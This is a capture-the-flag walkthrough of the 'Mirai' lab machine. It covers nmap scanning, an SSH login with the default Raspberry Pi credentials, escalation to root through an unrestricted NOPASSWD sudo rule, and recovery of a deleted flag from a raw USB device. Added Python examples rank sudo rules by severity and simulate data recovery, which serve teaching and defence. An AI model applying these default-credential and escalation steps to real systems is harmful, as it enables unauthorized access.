# Mirai

![](/files/LI45tkM3CrsaVlft1HJo)

## Enumeration

As always, we start with the enumeration phase: we scan the machine for open ports and identify the services and versions running on them.

The following nmap command quickly scans the target machine for open ports and saves the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.48 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, the fastest of the nmap timing templates.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

```
# Nmap 7.92 scan initiated Tue May 24 15:02:48 2022 as: nmap -sS -p- --min-rate 5000 -Pn -oN allPorts 10.10.10.48
Nmap scan report for 10.10.10.48
Host is up (0.061s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
1490/tcp  open  insitu-conf
32400/tcp open  plex
32469/tcp open  unknown

# Nmap done at Tue May 24 15:03:08 2022 -- 1 IP address (1 host up) scanned in 20.27 seconds
```

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports in more depth and save the result into a file:

> nmap -sC -sV -p22,53,80,1490,32400,32469 10.10.10.48 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

```
# Nmap 7.92 scan initiated Tue May 24 15:04:37 2022 as: nmap -sCV -p22,53,80,1490,32400,32469 -Pn -oN targeted 10.10.10.48
Nmap scan report for 10.10.10.48
Host is up (0.038s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1490/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
|_http-title: Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-favicon: Plex
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 24 15:04:59 2022 -- 1 IP address (1 host up) scanned in 22.74 seconds
```

If we scan the web server with the whatweb tool, we'll see that it has an uncommon header called `x-pi-hole`.

{% hint style="info" %}
**Pi-hole** is a Linux network-level advertisement and Internet tracker blocking application, which acts as a DNS sinkhole and optionally a DHCP server, intended for use on a private network. It is designed for low-power embedded devices with network capability, such as the Raspberry Pi.
{% endhint %}

> whatweb http://10.10.10.48

```
http://10.10.10.48 [404 Not Found] Country[RESERVED][ZZ], HTTPServer[lighttpd/1.4.35], IP[10.10.10.48], UncommonHeaders[x-pi-hole], lighttpd[1.4.35]
```

## Exploitation

As the *Pi-hole* server might be running on a *Raspberry Pi*, and port 22 (SSH) is open, we could try the default credentials for *Raspberry Pi* devices, which are the user `pi` and the password `raspberry`. Once we are logged in, we could grab the user flag.

> sshpass -p "raspberry" ssh pi@10.10.10.48

```
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 24 14:06:54 2022 from 10.10.14.3

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ cat Desktop/user.txt 
ff837707441b257a20e32199d7c8838d
```

## Privilege Escalation

We could try to list the *sudo* privileges of the `pi` user.

> sudo -l

```
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
```
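
Read from the defender's side, the last rule in this output is the finding. The following added example (not part of the original writeup) parses `sudo -l` output and ranks each rule. The function names and severity labels are assumptions, the sample is the output shown above, and tags placed in the middle of a command list are not handled.

```python
import re

# Sample input: the `sudo -l` output shown on this page.
SAMPLE = """Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
"""

RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG = re.compile(r"^([A-Z_]+):\s*")  # leading tags such as NOPASSWD: or SETENV:


def parse_sudo_l(text):
    """Return the rules listed after the 'User ... may run' header."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        rest, tags = m.group("rest"), []
        while (t := TAG.match(rest)):      # peel off leading tags
            tags.append(t.group(1))
            rest = rest[t.end():]
        commands = [c.strip() for c in rest.split(",")]
        rules.append({"runas": m.group("runas").strip(),
                      "tags": tags, "commands": commands})
    return rules


def severity(rule):
    """Hypothetical ranking: passwordless + unrestricted is the worst case."""
    unrestricted = "ALL" in rule["commands"]
    passwordless = "NOPASSWD" in rule["tags"]
    if unrestricted and passwordless:
        return "critical"
    if unrestricted:
        return "high"
    return "review" if passwordless else "ok"


if __name__ == "__main__":
    for r in parse_sudo_l(SAMPLE):
        print(severity(r), r)
```
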

The `(ALL) NOPASSWD: ALL` entry means we can execute any command as the *root* user without a password. Let's get a shell as root.

> sudo su

If we try to get the root flag, we'll get the following message.

> cat /root/root.txt

```
I lost my original root.txt! I think I may have a backup on my USB stick...
```

If we list the mounted filesystems, we'll see the `/dev/sdb` device mounted on `/media/usbstick`.

> df -h

* `-h` **human** readable.

```
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  35% /
tmpfs           100M  4.8M   96M   5% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  35% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000
```

Let's take a look at the `/media/usbstick` directory.

> ls -la /media/usbstick

```
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found
```

There is the `damnit.txt` file with the following message.

> cat /media/usbstick/damnit.txt

```
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James
```

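Deleting a file removes its directory entry but does not overwrite its data blocks, so the contents may still be on the device. If we print the printable strings of the raw `/dev/sdb` device, all we have to do is reap the harvest and take the root flag.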

> strings /dev/sdb

```
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
```
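
Why the deleted file's contents were still readable, shown as an added example that is not part of the original writeup: a toy block device where an ordinary delete only clears the directory entry's in-use byte, scanned with a small `strings`-style routine before and after the data block is overwritten. The block layout, function names and the 32-character value are constructed for illustration.

```python
import re

BLOCK = 1024                                    # toy block size (assumption)
SECRET = b"0123456789abcdef0123456789abcdef\n"  # constructed value, not a real flag


def build_image() -> bytearray:
    """Toy 4-block device: block 1 holds the directory, block 2 the file data."""
    img = bytearray(BLOCK * 4)
    img[BLOCK:BLOCK + 10] = b"\x01root.txt\x00"  # 0x01 = entry in use
    img[2 * BLOCK:2 * BLOCK + len(SECRET)] = SECRET
    return img


def delete_file(img: bytearray) -> None:
    """Ordinary delete in this model: mark the entry free, leave the data."""
    img[BLOCK] = 0x00


def wipe_file(img: bytearray) -> None:
    """Sanitising delete: overwrite the data block itself."""
    img[2 * BLOCK:3 * BLOCK] = bytes(BLOCK)


def printable_runs(data, min_len: int = 4):
    """Return (offset, text) for runs of printable ASCII, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e\t]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii"))
            for m in pattern.finditer(bytes(data))]


def hex_candidates(data):
    """Keep only runs that look like a 32-character hex value."""
    return [(off, s) for off, s in printable_runs(data)
            if re.fullmatch(r"[0-9a-f]{32}", s)]


if __name__ == "__main__":
    img = build_image()
    delete_file(img)
    print("after delete:", hex_candidates(img))  # data block still readable
    wipe_file(img)
    print("after wipe:  ", hex_candidates(img))  # nothing left to recover
```

The same reasoning is why removable media should be overwritten or encrypted rather than just emptied before it changes hands.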


